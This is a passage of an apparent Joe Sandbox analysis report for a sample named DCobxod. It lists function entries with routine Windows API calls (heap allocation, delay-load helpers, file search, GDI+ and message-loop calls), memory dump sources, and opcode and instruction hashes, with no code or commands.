                                                               • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: AddressProc
                                                              • String ID:
                                                              • API String ID: 190572456-0
                                                              • Opcode ID: a418614e3212bdbd33401996d35ac65291ce02ebd3451e55b61b50343d6e1d58
                                                              • Instruction ID: 0b20d1409021647625e206d513d61a9e873cd0d602e1c52906960970f45e27e6
                                                              • Opcode Fuzzy Hash: a418614e3212bdbd33401996d35ac65291ce02ebd3451e55b61b50343d6e1d58
                                                              • Instruction Fuzzy Hash: DC117A376402255F9B218F19EC4085B7392ABC9330F166222FC95EB344D738DC1287CA
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 0041CE45
                                                                • Part of subcall function 00415E37: __EH_prolog.LIBCMT ref: 00415E3C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                               • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: H_prolog
                                                              • String ID:
                                                              • API String ID: 3519838083-0
                                                              • Opcode ID: 64441dcd0320b683dbc885816a1d22d054a708e5e53de3331aa9c46780d22270
                                                              • Instruction ID: 8a2eb13eed5d25a64c4fe5038a8cf8c23b90361155581188e6eec3456660461d
                                                              • Opcode Fuzzy Hash: 64441dcd0320b683dbc885816a1d22d054a708e5e53de3331aa9c46780d22270
                                                              • Instruction Fuzzy Hash: 3211E3B1A41354DEEB10EB7AD9457EEBBE89F80304F10045FE446D3282DB789E44CB66
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                               • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: H_prolog
                                                              • String ID:
                                                              • API String ID: 3519838083-0
                                                              • Opcode ID: 43e88f3d4b89050ca629107c669de580b0e85da8cd26cd9cececbbd88e2b957f
                                                              • Instruction ID: 0864f300223f0584debb91c273789f38b43ba44b871cc479acf16c33274e13db
                                                              • Opcode Fuzzy Hash: 43e88f3d4b89050ca629107c669de580b0e85da8cd26cd9cececbbd88e2b957f
                                                              • Instruction Fuzzy Hash: 2B018673D00528ABCF11AB69CD919DEB731AF88744B01455AF811B7212DA388D4186A8
                                                              APIs
                                                                • Part of subcall function 0043B136: RtlAllocateHeap.NTDLL(00000008,00443A34,00000000,?,0043989A,00000001,00000364,?,?,?,0041D984,?,?,?,00000004,0041D710), ref: 0043B177
                                                              • _free.LIBCMT ref: 0043C4E5
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                               • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: AllocateHeap_free
                                                              • String ID:
                                                              • API String ID: 614378929-0
                                                              • Opcode ID: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
                                                              • Instruction ID: 4910ca41c4df597a0da4c8742673b25664d91dabcbff6875c5ae348db2b3e109
                                                              • Opcode Fuzzy Hash: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
                                                              • Instruction Fuzzy Hash: A0014E722003055BE331CF65D88196AFBECFB99370F25051EE184932C1EA34A805C778
                                                              APIs
                                                              • RtlAllocateHeap.NTDLL(00000008,00443A34,00000000,?,0043989A,00000001,00000364,?,?,?,0041D984,?,?,?,00000004,0041D710), ref: 0043B177
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: AllocateHeap
                                                              • String ID:
                                                              • API String ID: 1279760036-0
                                                              • Opcode ID: 32b678ba357d218565ecde52cba86d4181c82c838c826f44963f9005f527319b
                                                              • Instruction ID: 2f34f393e84797e691ec2fba5f96e6763d3e8be4a163497772ec467930067f3b
                                                              • Opcode Fuzzy Hash: 32b678ba357d218565ecde52cba86d4181c82c838c826f44963f9005f527319b
                                                              • Instruction Fuzzy Hash: 8FF0B43250512467EF315A32AC15B9F7748EB497F0F18A227FD48E6290CB68DE0186EC
                                                              APIs
                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00433C3F
                                                              Similarity
                                                              • API ID: AddressProc
                                                              • String ID:
                                                              • API String ID: 190572456-0
                                                              • Opcode ID: 104dc79bb5313b9d968436f8fdbc84738009eddc818d194b9ed15291b74be14a
                                                              • Instruction ID: 025915743d7c06ba2ee43f349527d84390b120c600c4d8f348e7456a60badd44
                                                              • Opcode Fuzzy Hash: 104dc79bb5313b9d968436f8fdbc84738009eddc818d194b9ed15291b74be14a
                                                              • Instruction Fuzzy Hash: B2F0EC372002169FDF125F69EC0099B7799EF09B22B106136FA05E7290DB35DA20CB94
                                                              APIs
                                                              • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0043CA2C,00000000,?,00436CBE,?,00000008,?,004391E0,?,?,?), ref: 00438E38
                                                              Similarity
                                                              • API ID: AllocateHeap
                                                              • String ID:
                                                              • API String ID: 1279760036-0
                                                              • Opcode ID: 8b6bc2211ae9c4ec11964972153f7e099c2f2eba6717703de146da0c7aa76b9e
                                                              • Instruction ID: ae38997560b281ddc85112747880c5f9a48f1eace35a4a8a5207ef841455ad74
                                                              • Opcode Fuzzy Hash: 8b6bc2211ae9c4ec11964972153f7e099c2f2eba6717703de146da0c7aa76b9e
                                                              • Instruction Fuzzy Hash: 73E0E53220231557EA7136329C06B9FF6489B497B4F21212FBC58D7281CFACCD0181ED
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 00415AC2
                                                                • Part of subcall function 0041B505: __EH_prolog.LIBCMT ref: 0041B50A
                                                              Similarity
                                                              • API ID: H_prolog
                                                              • String ID:
                                                              • API String ID: 3519838083-0
                                                              • Opcode ID: 37ca8cfa479620c40c1d3f6b1080aafda8c4a9801df291431676aca0479fd7f5
                                                              • Instruction ID: 13e29126a3d548cf150ab6c0dfd4fc000fd2bc2097ce2f51a9912ea2289560ba
                                                              • Opcode Fuzzy Hash: 37ca8cfa479620c40c1d3f6b1080aafda8c4a9801df291431676aca0479fd7f5
                                                              • Instruction Fuzzy Hash: 020181306106A0DAD715EBB9D0417DDFBE4DF54708F90848FA45653283CBB81B09D7AA
                                                              APIs
                                                                • Part of subcall function 0041A69B: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0041A592,000000FF,?,?), ref: 0041A6C4
                                                                • Part of subcall function 0041A69B: FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,0041A592,000000FF,?,?), ref: 0041A6F2
                                                                • Part of subcall function 0041A69B: GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0041A592,000000FF,?,?), ref: 0041A6FE
                                                              • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0041A598
                                                              Similarity
                                                              • API ID: Find$FileFirst$CloseErrorLast
                                                              • String ID:
                                                              • API String ID: 1464966427-0
                                                              • Opcode ID: f68448ca1137dfb107b7c0da52cbc1508292b7d6dd80ca282a0239d30463136c
                                                              • Instruction ID: dcea5790c9afa39019d93778edae3a57312ac3d38aa4b2c6c314973620be16a5
                                                              • Opcode Fuzzy Hash: f68448ca1137dfb107b7c0da52cbc1508292b7d6dd80ca282a0239d30463136c
                                                              • Instruction Fuzzy Hash: FEF0E93100E380AACB2257B44900BC77BD45F16335F048A4FF1FD1219AC27910E49B27
                                                              APIs
                                                              • SetThreadExecutionState.KERNEL32(00000001), ref: 00420E3D
                                                              Similarity
                                                              • API ID: ExecutionStateThread
                                                              • String ID:
                                                              • API String ID: 2211380416-0
                                                              • Opcode ID: 8bde7dede9e4decc9413afa392ce97d936759d00f12b156c5dd22a3eb2e0908b
                                                              • Instruction ID: 3af34965bb91c725d65f111094d99081b1575072161f283576000dbfbe349651
                                                              • Opcode Fuzzy Hash: 8bde7dede9e4decc9413afa392ce97d936759d00f12b156c5dd22a3eb2e0908b
                                                              • Instruction Fuzzy Hash: B5D0C2107010642ADA21332A39157FF29668FD671AF0E003BF14A576E3DE4C88C6A2AD
                                                              APIs
                                                              • GdipAlloc.GDIPLUS(00000010), ref: 0042A62C
                                                                • Part of subcall function 0042A3B9: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 0042A3DA
                                                              Similarity
                                                              • API ID: Gdip$AllocBitmapCreateFromStream
                                                              • String ID:
                                                              • API String ID: 1915507550-0
                                                              • Opcode ID: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                              • Instruction ID: 7bd7009f5d657021ba9bb7cda89bce62989bfe3793759df83c959f29119956e9
                                                              • Opcode Fuzzy Hash: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                              • Instruction Fuzzy Hash: 15D0A730300218B7DF01AB22EC02A7E7995EB00344F408027BC81C5141EBB5D920915B
                                                              APIs
                                                              • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,00421B3E), ref: 0042DD92
                                                                • Part of subcall function 0042B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0042B579
                                                                • Part of subcall function 0042B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0042B58A
                                                                • Part of subcall function 0042B568: IsDialogMessageW.USER32(0001041E,?), ref: 0042B59E
                                                                • Part of subcall function 0042B568: TranslateMessage.USER32(?), ref: 0042B5AC
                                                                • Part of subcall function 0042B568: DispatchMessageW.USER32(?), ref: 0042B5B6
                                                              Similarity
                                                              • API ID: Message$DialogDispatchItemPeekSendTranslate
                                                              • String ID:
                                                              • API String ID: 897784432-0
                                                              • Opcode ID: 26384babe31eebbf60032730609f5bf7ab6f02dbfe6ca4a70db97dc43feea32b
                                                              • Instruction ID: 2076b56287998263e6beede8d49c1185d56b5be391ef85206b6293bc99638e04
                                                              • Opcode Fuzzy Hash: 26384babe31eebbf60032730609f5bf7ab6f02dbfe6ca4a70db97dc43feea32b
                                                              • Instruction Fuzzy Hash: CAD09E31244300FAD6012B52DD06F0A7BE2EB88B09F404559B284740B28A76AD61EF19
                                                              APIs
                                                              • DloadProtectSection.DELAYIMP ref: 0042E5E3
                                                              Similarity
                                                              • API ID: DloadProtectSection
                                                              • String ID:
                                                              • API String ID: 2203082970-0
                                                              • Opcode ID: 3fa0ea839b8a3718661af65d4229c0ff68ffea15ba59dbe090c6d4f639b003bf
                                                              • Instruction ID: f13945102937bbac0898db191a2bedf209f0e1602f653935ebecb6d6515cabc8
                                                              • Opcode Fuzzy Hash: 3fa0ea839b8a3718661af65d4229c0ff68ffea15ba59dbe090c6d4f639b003bf
                                                              • Instruction Fuzzy Hash: EBD0A9B03902A0AFC602EBFFB9827153350B321708FD40027B14C825A1CB7C40C5C60E
                                                              APIs
                                                              • GetFileType.KERNELBASE(000000FF,004197BE), ref: 004198C8
                                                              Similarity
                                                              • API ID: FileType
                                                              • String ID:
                                                              • API String ID: 3081899298-0
                                                              • Opcode ID: b3af3531f681f0275bcc1d0f0c2555ecf1fbeb209f128011755d8f4d7bb53287
                                                              • Instruction ID: 762ffb9570b1acb84b1fe62419ea1ce5b426609e205f710f56098ade2b5d1dfc
                                                              • Opcode Fuzzy Hash: b3af3531f681f0275bcc1d0f0c2555ecf1fbeb209f128011755d8f4d7bb53287
                                                              • Instruction Fuzzy Hash: 69C01234410105858E206B2498540D67311AB533667B48795C02C851A1C326CCDBEA15
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0042E3FC
                                                                • Part of subcall function 0042E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0042E8D0
                                                                • Part of subcall function 0042E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0042E8E1
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: dae6ea2065bb527b1685ba68d4b33f4c5ee7e929d9dbbb6501712b6b54e2a3fa
                                                              • Instruction ID: 44698585c2c01655e3e3a4440f4ac9c6138f406c1b9fcb85cdf2c26079441270
                                                              • Opcode Fuzzy Hash: dae6ea2065bb527b1685ba68d4b33f4c5ee7e929d9dbbb6501712b6b54e2a3fa
                                                              • Instruction Fuzzy Hash: 07B012E135A060BC3144E1073C02D37020CC0C2B22371C02FFC48D2080E88C4C05143F
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0042E3FC
                                                                • Part of subcall function 0042E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0042E8D0
                                                                • Part of subcall function 0042E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0042E8E1
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: 35f9bc29a8bd851ea0e3c4144002fcb017aebf8fc806ee014811733284492aa1
                                                              • Instruction ID: cba290f9e246eac17d3ffdafed68aa7fb305e3c0a829d019b96e2db9e132ce29
                                                              • Opcode Fuzzy Hash: 35f9bc29a8bd851ea0e3c4144002fcb017aebf8fc806ee014811733284492aa1
                                                              • Instruction Fuzzy Hash: ECB012E135A0707C3144E1073D02D77020CC0C2B22371C02FF908D2080E88C0C0A143F
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0042E3FC
                                                                • Part of subcall function 0042E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0042E8D0
                                                                • Part of subcall function 0042E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0042E8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                               • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: 8281c76a8bf000e07d2edb0f0279be40471c64aa4e824eede4fdff62e15a6edb
                                                              • Instruction ID: 4d35f6efdd5d36ce7e3da10f7017444b47dd94cf29d4b54b815659157c327f89
                                                              • Opcode Fuzzy Hash: 8281c76a8bf000e07d2edb0f0279be40471c64aa4e824eede4fdff62e15a6edb
                                                              • Instruction Fuzzy Hash: 1EB092A135A060BC3144E1072802D360208C082B22371C02FF848C2081E88C4A01147B
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0042E580
                                                                • Part of subcall function 0042E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0042E8D0
                                                                • Part of subcall function 0042E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0042E8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                               • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: d02b20f1440a7186343460469028726fa77b21339d3231c53f093f02cdecb5ad
                                                              • Instruction ID: 98802b52e36d0eb1e3a9cb29e2027f88f4fd724bbbc74fca448041ac7f67d550
                                                              • Opcode Fuzzy Hash: d02b20f1440a7186343460469028726fa77b21339d3231c53f093f02cdecb5ad
                                                              • Instruction Fuzzy Hash: 4CB012C136A0207D314461973C02D77034CC0C1B253B2C02FF408C2080F84C0C45143F
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0042E580
                                                                • Part of subcall function 0042E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0042E8D0
                                                                • Part of subcall function 0042E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0042E8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                               • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: 4bd65c8562562adfc40b04dc863649a9236dd5b951d59003d9361a0bcc19cc44
                                                              • Instruction ID: 17717d9e96aa2451fd38497bda27772fa71c334abf57b42a1d2c30bccfd87f19
                                                              • Opcode Fuzzy Hash: 4bd65c8562562adfc40b04dc863649a9236dd5b951d59003d9361a0bcc19cc44
                                                              • Instruction Fuzzy Hash: 2FB0928136A0207C314461966902D36021CC081B153B6C22FF408C2080E84C0946143E
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0042E580
                                                                • Part of subcall function 0042E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0042E8D0
                                                                • Part of subcall function 0042E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0042E8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                               • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: 3108e96e5541dd167a27948471c2048decde119ef8345d4038a74d32725fac4d
                                                              • Instruction ID: 45dcfd52b886d74b7b9b93038a26b222bdbfdc41f0238591fb98c64f53d02cb7
                                                              • Opcode Fuzzy Hash: 3108e96e5541dd167a27948471c2048decde119ef8345d4038a74d32725fac4d
                                                              • Instruction Fuzzy Hash: 71B012C136A1207C318461977C03D37021CC0C1B153B6C22FF408C2480F84C0C85143E
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0042E3FC
                                                                • Part of subcall function 0042E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0042E8D0
                                                                • Part of subcall function 0042E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0042E8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                               • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: 3591b8c07a515d0c55c961c454bbdf857f154c1100a0ee5da798be70d90d1330
                                                              • Instruction ID: 0aea5a85eece1e2038eb56b1c2b4d6eac8aef3279865e22ca2d8478b176df0af
                                                              • Opcode Fuzzy Hash: 3591b8c07a515d0c55c961c454bbdf857f154c1100a0ee5da798be70d90d1330
                                                              • Instruction Fuzzy Hash: 91A001E63AA1627D3148A2537D46D3B021DD4C2B6A3B6952FF865A6481AC881846187B
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0042E3FC
                                                                • Part of subcall function 0042E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0042E8D0
                                                                • Part of subcall function 0042E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0042E8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                               • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: 450b3810c72f3f2a590fef382e4256cb92d913e03ed9791eecdd8f04c71c3ea1
                                                              • Instruction ID: e4fdbdefaae807636503aac1c83fa6f75e8d241ef493d64b0b473c52a4975529
                                                              • Opcode Fuzzy Hash: 450b3810c72f3f2a590fef382e4256cb92d913e03ed9791eecdd8f04c71c3ea1
                                                              • Instruction Fuzzy Hash: 13A001E63AA162BC3148A2537D46D3B021DD4C6BA63B6992FF85696481A8881846187B
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0042E3FC
                                                                • Part of subcall function 0042E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0042E8D0
                                                                • Part of subcall function 0042E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0042E8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                               • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: 037d7569e41b96ef08617f6b4e0616be0b58a29d6058900bfdeffa877d91552c
                                                              • Instruction ID: e4fdbdefaae807636503aac1c83fa6f75e8d241ef493d64b0b473c52a4975529
                                                              • Opcode Fuzzy Hash: 037d7569e41b96ef08617f6b4e0616be0b58a29d6058900bfdeffa877d91552c
                                                              • Instruction Fuzzy Hash: 13A001E63AA162BC3148A2537D46D3B021DD4C6BA63B6992FF85696481A8881846187B
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0042E3FC
                                                                • Part of subcall function 0042E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0042E8D0
                                                                • Part of subcall function 0042E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0042E8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
